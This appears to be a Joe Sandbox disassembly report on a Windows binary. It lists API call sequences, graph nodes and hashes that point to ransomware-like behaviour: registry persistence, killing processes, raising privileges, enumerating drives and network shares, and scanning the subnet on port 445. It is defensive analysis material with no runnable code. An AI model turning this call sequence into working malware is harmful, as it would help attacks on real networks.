ca2e69 3824->3832 4192 ca1000 3824->4192 3827 ca24c2 121 API calls 3825->3827 3828 ca2ebe 3826->3828 3829 ca2e9d EnterCriticalSection LeaveCriticalSection 3826->3829 3827->3814 3828->3812 3831 ca2ec2 WaitForMultipleObjects 3828->3831 3829->3828 3831->3812 3833 ca2946 18 API calls 3832->3833 3834 ca2e74 3832->3834 3833->3834 3834->3826 3835 ca4dbe 28 API calls 3834->3835 3835->3826 4260 ca9041 3836->4260 3838 ca62b1 3839 ca9041 2 API calls 3838->3839 3844 ca62f9 3838->3844 3840 ca62c5 3839->3840 3841 ca9041 2 API calls 3840->3841 3842 ca62d3 3841->3842 3843 ca6274 2 API calls 3842->3843 3842->3844 3843->3844 3844->3702 3846 ca636b 3845->3846 3848 ca6383 3845->3848 3847 ca9041 2 API calls 3846->3847 3846->3848 3847->3848 3848->3704 3850 ca287d 3849->3850 3851 ca2883 3849->3851 4263 ca90a1 GetProcessHeap RtlFreeHeap 3850->4263 3853 ca2891 3851->3853 4264 ca90a1 GetProcessHeap RtlFreeHeap 3851->4264 3855 ca289f 3853->3855 4265 ca90a1 
[Control-flow graph for the functions at ca1000-ca9xxx: the rendered graph is not reproduced here; only its node/edge dump (node id, code address, imported API names, src->dst edges) survived extraction and is omitted. API sequences recoverable from that dump, by code address:
      • Heap management throughout via GetProcessHeap with RtlAllocateHeap, RtlFreeHeap and HeapReAlloc (ca9041, ca90a1, ca907a).
      • File read at ca278f: CreateFileW, SetFilePointer, ReadFile, MultiByteToWideChar, CloseHandle; directory walk at ca5dbb: FindFirstFileW, FindNextFileW, FindClose.
      • Token and privilege handling: GetVersion, GetCurrentProcess, OpenProcessToken, GetTokenInformation (ca3e39); GetTokenInformation, AllocateAndInitializeSid, EqualSid, LookupAccountSidW, FreeSid (ca4428); LookupPrivilegeValueW, AdjustTokenPrivileges (ca3dc0); GetShellWindow, GetWindowThreadProcessId, OpenProcess, OpenProcessToken, DuplicateTokenEx (ca4aa3).
      • Single-instance mutex: OpenMutexW, CreateMutexW, WaitForSingleObject, ReleaseMutex (ca4f17).
      • HTTP request: WinHttpOpen, WinHttpConnect, WinHttpOpenRequest, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpCloseHandle (ca3cbd).
      • Persistence: GetModuleFileNameW, CopyFileW, RegOpenKeyExW, RegSetValueExW, RegCloseKey, GetFileAttributesW, SetFileAttributesW (ca1378-ca14dd).
      • Process launch: CreateProcessW (ca48f1); CreatePipe, SetHandleInformation, CreateProcessW, WriteFile, WaitForSingleObject (ca4c27, child fed through a pipe); CreateFileW, WriteFile, CloseHandle followed by ShellExecuteExW (ca3969); CreateFileW, WriteFile, FlushFileBuffers, CloseHandle, ShellExecuteExW, WaitForSingleObject, DeleteFileW (ca4724-ca4819).
      • Process termination loop: CreateToolhelp32Snapshot, Process32FirstW, OpenProcess, TerminateProcess, CloseHandle, Process32NextW (ca4dee).
      • Drive and network enumeration: GetLogicalDrives, GetVolumeInformationW; GetIpAddrTable, htonl, htons, socket, ioctlsocket, connect, select, getsockopt, recv, getpeername, closesocket, WSAGetLastError, GetTickCount (ca5230-ca5219, connect attempts over addresses derived from GetIpAddrTable); WSAAddressToStringW, WNetUseConnectionW, WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum (ca1e10, network resource enumeration); GetComputerNameW (ca21c6).
      • Self-inspection: GetCurrentProcessId, OpenProcess, ReadProcessMemory, GetModuleFileNameW (ca3fe6).
      • Threading, synchronisation and console output: CreateThread, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, AllocConsole, GetStdHandle, WriteConsoleW, WideCharToMultiByte, CoInitializeEx, CoUninitialize, ExpandEnvironmentStringsW, Sleep.]

      Control-flow Graph

      • Executed
      • Not Executed
[Control-flow graph for the function at ca29f5-ca2fa6 omitted; it is the top-level dispatcher that calls ca2876, ca271b, ca3772, ca28ca, ca5930, ca4ea5, ca4f7a, ca49d3, ca242f, ca4944, ca4dbe, ca489e, ca2946, ca1236, ca3c7a, ca1894, ca24c2, ca1000 and ca5962. Its own edges show GetTickCount, GetLocaleInfoW (ca2aa6, after which control either continues to ca2ad4 or branches straight to the cleanup at ca2ef0), EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, CreateThread, WaitForSingleObject, WaitForMultipleObjects, Sleep, ReleaseMutex and CloseHandle.]
      APIs
      • GetTickCount.KERNEL32 ref: 00CA2A94
      • GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00CA2AB4
      • Sleep.KERNEL32(00001388), ref: 00CA2B9D
      • Sleep.KERNEL32(00000064), ref: 00CA2C53
      • Sleep.KERNEL32(00001388), ref: 00CA2C82
      • CreateThread.KERNELBASE(00000000,00000000,00CA239A,?,00000000,00000000), ref: 00CA2D55
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA2E45
        • Part of subcall function 00CA4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00CA2C6F,00000001), ref: 00CA4F95
        • Part of subcall function 00CA4F7A: CloseHandle.KERNEL32(?,?,00CA2C6F,00000001), ref: 00CA4F9E
      • EnterCriticalSection.KERNEL32(?), ref: 00CA2EA7
      • LeaveCriticalSection.KERNEL32(?), ref: 00CA2EB4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 00CA2ECF
      • CloseHandle.KERNEL32(?), ref: 00CA2EE6
        • Part of subcall function 00CA489E: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00CA4908
        • Part of subcall function 00CA489E: CloseHandle.KERNEL32(?), ref: 00CA491E
        • Part of subcall function 00CA489E: CloseHandle.KERNEL32(?), ref: 00CA4923
      • EnterCriticalSection.KERNEL32(?), ref: 00CA2F13
      • CloseHandle.KERNEL32(?), ref: 00CA2F22
      • CloseHandle.KERNEL32(?), ref: 00CA2F31
      • DeleteCriticalSection.KERNEL32(?), ref: 00CA2F38
      • ReleaseMutex.KERNEL32(?), ref: 00CA2F83
      • CloseHandle.KERNEL32(?), ref: 00CA2F8D
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$Sleep$CreateEnterMutexReleaseWait$CountDeleteInfoLeaveLocaleMultipleObjectObjectsProcessSingleThreadTick
      • String ID:
      • API String ID: 2025543672-0
      • Opcode ID: 8c7798bb959f0b022b54dba5cb25000c9c63793c9ba6ec3641c911a7b8c4c739
      • Instruction ID: 819844a172ee938bc0d3c9b487f7b430cb7fd430d2ccc7fe8fbd24746d13234b
      • Opcode Fuzzy Hash: 8c7798bb959f0b022b54dba5cb25000c9c63793c9ba6ec3641c911a7b8c4c739
      • Instruction Fuzzy Hash: CBF1C332508363AFDB20AFA89C41A2FB7E4AF8671DF04092EF59192191D770CE85DB53
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CA4E00
      • Process32FirstW.KERNEL32(00CA2351,?), ref: 00CA4E38
      • OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 00CA4E68
      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00CA4E76
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CA4E7F
      • Process32NextW.KERNEL32(00CA2351,?), ref: 00CA4E8E
      • FindCloseChangeNotification.KERNELBASE(00CA2351,?,?,?), ref: 00CA4E9C
      Yara matches
      Similarity
      • API ID: CloseProcessProcess32$ChangeCreateFindFirstHandleNextNotificationOpenSnapshotTerminateToolhelp32
      • String ID:
      • API String ID: 2062350143-0
      • Opcode ID: 21cce1728a27f51b7e5d58ad7add0201c563317de0fec79b71c5ce40d8327f90
      • Instruction ID: f706b2daa8895f3adb9c435afaa7010f8a70710c56f76e052014b9e3a909b077
      • Opcode Fuzzy Hash: 21cce1728a27f51b7e5d58ad7add0201c563317de0fec79b71c5ce40d8327f90
      • Instruction Fuzzy Hash: DB11217190121ABFDB11ABA5DC88B9FBBBCEF8A718F1000A5E905E3150D7749F45CB91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(00000020,00CA232B,00000000,?,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DD5
      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DDC
      • LookupPrivilegeValueW.ADVAPI32(00000000,00CA232B,?), ref: 00CA3DEE
      • AdjustTokenPrivileges.KERNELBASE(00CA232B,00000000,?,00000000,00000000,00000000), ref: 00CA3E1D
      • FindCloseChangeNotification.KERNELBASE(00CA232B,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3E2D
      Yara matches
      Similarity
      • API ID: ProcessToken$AdjustChangeCloseCurrentFindLookupNotificationOpenPrivilegePrivilegesValue
      • String ID:
      • API String ID: 4140947299-0
      • Opcode ID: 5d992e10fb88fd5b993ef3c1e06157a255c08001e11927b9d4a1a0941c8646b6
      • Instruction ID: 663ec1864c2c85b1166e1998ee9c5968f9b5c7b87e346a9f7096b166149c42bd
      • Opcode Fuzzy Hash: 5d992e10fb88fd5b993ef3c1e06157a255c08001e11927b9d4a1a0941c8646b6
      • Instruction Fuzzy Hash: E601E576900229ABCB119FA6DC48AEFBFBCEF4A754F044026F906E2150D7748645CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetVersion.KERNEL32(?,00CA2B0D), ref: 00CA3E42
      • GetCurrentProcess.KERNEL32(00000008,?), ref: 00CA3E58
      • OpenProcessToken.ADVAPI32(00000000), ref: 00CA3E5F
      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CA3E7D
      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CA3E93
      Yara matches
      Similarity
      • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpenVersion
      • String ID:
      • API String ID: 4059737031-0
      • Opcode ID: 0741099982cb52e0a182ef06c581289042fddda8fcf5df57890c29a754a54e47
      • Instruction ID: edc88359a49c6b1cdc0c32f04f2989f64c58303d1b956811bfbff767a76fe914
      • Opcode Fuzzy Hash: 0741099982cb52e0a182ef06c581289042fddda8fcf5df57890c29a754a54e47
      • Instruction Fuzzy Hash: 3FF03C71900218FBDB119BE4DC19BEEB778FB06709F104065FA02E2090D7709F49DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetProcessHeap.KERNEL32(00000000,00CA633F,00CA62A2,00000000,00000010,00000000,00000020,00CA633F,00000040,00CA2A6F,00CAB410), ref: 00CA90A7
      • RtlFreeHeap.NTDLL(00000000), ref: 00CA90AE
      Yara matches
      Similarity
      • API ID: Heap$FreeProcess
      • String ID:
      • API String ID: 3859560861-0
      • Opcode ID: 1c3ae6f35e1c2eb9867fe3e9b4067f7167df825d7cccd84d40db862720b8e0ac
      • Instruction ID: 56bab6c22b4d84e2bd7ec72f420899ae6fcf49d4e0b84b6c0c3ad7aaece90c37
      • Opcode Fuzzy Hash: 1c3ae6f35e1c2eb9867fe3e9b4067f7167df825d7cccd84d40db862720b8e0ac
      • Instruction Fuzzy Hash: 16B002B5544200FFDE515BE4DE0DB0D7A79AB45706F018444F34786160C7754410EB63
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00CA5B3B,00000000,00000000,00000000,00CA37EB,00000000), ref: 00CA5B19
      • CopyFileW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CA137E
      • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020106,?), ref: 00CA13A9
      • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020106,?), ref: 00CA13EF
      • CopyFileW.KERNELBASE(?,00000000,00000001), ref: 00CA1444
      • GetFileAttributesW.KERNELBASE(00000000), ref: 00CA144B
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00CA145B
      • CopyFileW.KERNELBASE(?,00000000,00000001), ref: 00CA14A8
      • CopyFileW.KERNELBASE(?,00000000,00000001), ref: 00CA14CB
      • GetFileAttributesW.KERNELBASE(00000000), ref: 00CA14D2
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00CA14E2
        • Part of subcall function 00CA3A93: RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00CA1408,?,00000104,?,00CA1408,00000000,00000000), ref: 00CA3AA6
        • Part of subcall function 00CA3A93: RegCloseKey.ADVAPI32(?,?,00CA1408,00000000,00000000), ref: 00CA3AB2
      Yara matches
      Similarity
      • API ID: File$AttributesCopy$HeapOpen$AllocateCloseModuleNameProcessValue
      • String ID:
      • API String ID: 2776276768-0
      • Opcode ID: 6753e262052bda9b219d400296275a2e5b994ba298abdc616a74820aef8f2f26
      • Instruction ID: 6243432f5013abe7bacd7783174d8e7d0c176ba365d68004d7846d9246418f76
      • Opcode Fuzzy Hash: 6753e262052bda9b219d400296275a2e5b994ba298abdc616a74820aef8f2f26
      • Instruction Fuzzy Hash: 0B918071D0020AAEDF116BB4EC46FEE7BB9EF4A319F244016F416B5091EB719E50EB60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00CA1E66
      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00CA1E83
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
      • WNetEnumResourceW.MPR(?,?,?,?), ref: 00CA2046
      • WNetCloseEnum.MPR(?), ref: 00CA205E
      Strings
      Yara matches
      Similarity
      • API ID: Enum$CriticalHeapResourceSection$AllocateCloseEnterLeaveOpenProcess
      • String ID: \\?\UNC\\\e-
      • API String ID: 2652425650-4184602625
      • Opcode ID: ca2164e635fc049be315abd8d31f9159d205fe7d7153fc3f0c8797c8e01c0d60
      • Instruction ID: 45efae7eed2399f84bbe94f967122e5cf685aa0e96addd04a6acafa46a7c9bff
      • Opcode Fuzzy Hash: ca2164e635fc049be315abd8d31f9159d205fe7d7153fc3f0c8797c8e01c0d60
      • Instruction Fuzzy Hash: 6B61E072204303AFDB209F68DC45E6F7BE9EF86358F040918F865D21A2E731DA55DB52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6), ref: 00CA279B
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA27B8
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA27E3
      • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA27F5
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000), ref: 00CA2813
      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA2830
      Yara matches
      Similarity
      • API ID: File$HeapPointer$AllocateByteCharCloseCreateHandleMultiProcessReadWide
      • String ID:
      • API String ID: 660798709-0
      • Opcode ID: 45daee833316918187307fa49676aa2b16ddfa3bdb118f922851707f8cce4327
      • Instruction ID: 2663f8c95871d77e6619d776975abe301627301d0b5eddd6af7217aea0d02722
      • Opcode Fuzzy Hash: 45daee833316918187307fa49676aa2b16ddfa3bdb118f922851707f8cce4327
      • Instruction Fuzzy Hash: 4141B972D0022ABFDB215BA9DC85DAFBFB8EF96758F20012AF510A1091D7354F41DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLogicalDrives.KERNEL32 ref: 00CA1A82
        • Part of subcall function 00CA530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00CA2195), ref: 00CA5327
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00CA2195), ref: 00CA5347
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00CA2195), ref: 00CA5352
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
        • Part of subcall function 00CA1706: htonl.WS2_32(?), ref: 00CA1774
        • Part of subcall function 00CA5840: CreateThread.KERNEL32(00000000,00000000,00CA56B3,00000000,00000000,00000000), ref: 00CA58F2
      • CloseHandle.KERNEL32(00000000), ref: 00CA1B37
      • CloseHandle.KERNEL32(00000000), ref: 00CA1B6B
      Strings
      Yara matches
      Similarity
      • API ID: CreateCriticalSection$CloseEventHandle$CountDrivesEnterInformationInitializeLeaveLogicalSpinThreadVolumehtonl
      • String ID: \\?\X:
      • API String ID: 1738266806-1324186152
      • Opcode ID: 060d829b832ce30e65ee6ca7b992c795074e14043481078745fa57d28780c5a2
      • Instruction ID: ef4a8004d40be2a67c04efebf2a07ae122305dc651558c052ea60e4e72d952df
      • Opcode Fuzzy Hash: 060d829b832ce30e65ee6ca7b992c795074e14043481078745fa57d28780c5a2
      • Instruction Fuzzy Hash: 0131B6B2500707ABCB117F709C46A2FB7A8FF46768F044515FC5896162EB31DA11DBA2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLogicalDrives.KERNELBASE ref: 00CA1CD1
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
        • Part of subcall function 00CA530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00CA2195), ref: 00CA5327
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00CA2195), ref: 00CA5347
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00CA2195), ref: 00CA5352
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
      • GetLogicalDrives.KERNEL32 ref: 00CA1D33
      • Sleep.KERNEL32(000003E8), ref: 00CA1DC3
      Strings
      Yara matches
      Similarity
      • API ID: CriticalSection$CreateDrivesEventLogical$CountEnterInformationInitializeLeaveSleepSpinVolume
      • String ID: \\?\ :
      • API String ID: 2297414327-2836105686
      • Opcode ID: b33d963addcfb55da1e8af5c9c06e7ef4c70cd07334c06979588ff4464515277
      • Instruction ID: c75932cc00f193005bf25dedd0b2b96532c812c5d51731eeb9252ea82c7cb66d
      • Opcode Fuzzy Hash: b33d963addcfb55da1e8af5c9c06e7ef4c70cd07334c06979588ff4464515277
      • Instruction Fuzzy Hash: E9319F76904707AFC701EF60C88192FBBA5FF86358F040A29FC54962A1EB31DE54DB92
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 542 ca4ea5-ca4f15 call ca3c7a call ca6347 call ca5a46 * 2 call ca5fe7 553 ca4f4d 542->553 554 ca4f17-ca4f28 OpenMutexW 542->554 557 ca4f4f-ca4f53 553->557 555 ca4f2a-ca4f37 CreateMutexW 554->555 556 ca4f39-ca4f49 WaitForSingleObject 554->556 555->556 558 ca4f60 555->558 559 ca4f4b 556->559 560 ca4f62-ca4f79 call ca39da * 2 556->560 557->560 561 ca4f55-ca4f5e CloseHandle 557->561 558->560 559->557 561->560
      APIs
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
      • OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F1E
      • CreateMutexW.KERNELBASE(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F2D
      • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00CA4F3C
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00CA4F56
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseCreateHandleInformationObjectOpenSingleVolumeWait
      • String ID:
      • API String ID: 1595014494-0
      • Opcode ID: a3ea1569fa1c12945a9bba95aba561073e8d452ee3d85a3d6bc81a82dd9d694a
      • Instruction ID: 767f50fc4b02c46f33732633d98a764bdefc428ab16407ac212cafd8db87dcaa
      • Opcode Fuzzy Hash: a3ea1569fa1c12945a9bba95aba561073e8d452ee3d85a3d6bc81a82dd9d694a
      • Instruction Fuzzy Hash: 5B21B2B5A0024AAFCB116FA1DC859ADBBF5FBC6358F204429F555A7200DB708D459B10
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 566 ca5230-ca5256 call ca9041 569 ca5258-ca5267 GetIpAddrTable 566->569 570 ca52d7-ca52dd 566->570 571 ca5269-ca526f 569->571 572 ca52d0-ca52d6 call ca90a1 569->572 571->572 573 ca5271-ca5277 571->573 572->570 575 ca527a-ca5283 htonl 573->575 577 ca52c1-ca52ce 575->577 578 ca5285-ca52be htonl * 2 call ca5067 * 2 575->578 577->572 577->575 578->577
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00CA525F
      • htonl.WS2_32(00000004), ref: 00CA527C
      • htonl.WS2_32(00000004), ref: 00CA5287
      • htonl.WS2_32(?), ref: 00CA528E
        • Part of subcall function 00CA5067: htons.WS2_32(000001BD), ref: 00CA5085
        • Part of subcall function 00CA5067: htonl.WS2_32(00000000), ref: 00CA50DB
        • Part of subcall function 00CA5067: socket.WS2_32(00000002,00000001,00000006), ref: 00CA50EC
        • Part of subcall function 00CA5067: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00CA5102
        • Part of subcall function 00CA5067: connect.WS2_32(00000000,?,00000010), ref: 00CA5113
        • Part of subcall function 00CA5067: WSAGetLastError.WS2_32 ref: 00CA511D
        • Part of subcall function 00CA5067: getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 00CA517C
        • Part of subcall function 00CA5067: recv.WS2_32(?,?,00000001,00000002), ref: 00CA5195
        • Part of subcall function 00CA5067: WSAGetLastError.WS2_32 ref: 00CA51A2
        • Part of subcall function 00CA5067: getpeername.WS2_32(?,?,?), ref: 00CA51C9
        • Part of subcall function 00CA5067: closesocket.WS2_32(?), ref: 00CA51E3
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: htonl$ErrorHeapLast$AddrAllocateProcessTableclosesocketconnectgetpeernamegetsockopthtonsioctlsocketrecvsocket
      • String ID:
      • API String ID: 1827020252-0
      • Opcode ID: da58a1ecc10b9f6426e87ff24ec935c4a09f926d981e2d7f4e41feed42e9410e
      • Instruction ID: 76f1282326465e4782a21f4a465ed489574db51285f47ca23341ad8941ad2bea
      • Opcode Fuzzy Hash: da58a1ecc10b9f6426e87ff24ec935c4a09f926d981e2d7f4e41feed42e9410e
      • Instruction Fuzzy Hash: 0311D372600316AFCB10AF68CCC5A6ABBA8FB4A359F104A3AF454C3212D731D954CBE1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00CA2195), ref: 00CA5327
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00CA2195), ref: 00CA5347
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00CA2195), ref: 00CA5352
      • GetComputerNameW.KERNEL32(00000010,00000008), ref: 00CA21D5
      • Sleep.KERNELBASE(00002710), ref: 00CA2297
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventHeap$AllocateComputerCountCriticalInitializeNameProcessSectionSleepSpin
      • String ID: \\?\UNC\\\e-
      • API String ID: 1430921793-4184602625
      • Opcode ID: 59cf05daf42f5b85979dab41ae89eb4a2f5b2e40171a56bc0edbdabb2aa472fe
      • Instruction ID: 09ef58354e109b8346f64269fb30f038e775cc3f606f89c667d20aa3a2d48d84
      • Opcode Fuzzy Hash: 59cf05daf42f5b85979dab41ae89eb4a2f5b2e40171a56bc0edbdabb2aa472fe
      • Instruction Fuzzy Hash: 8141087290020ABAEB11EBA4DC87FAF777CEF56758F244015FA00A60C2D7709F44E6A5
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

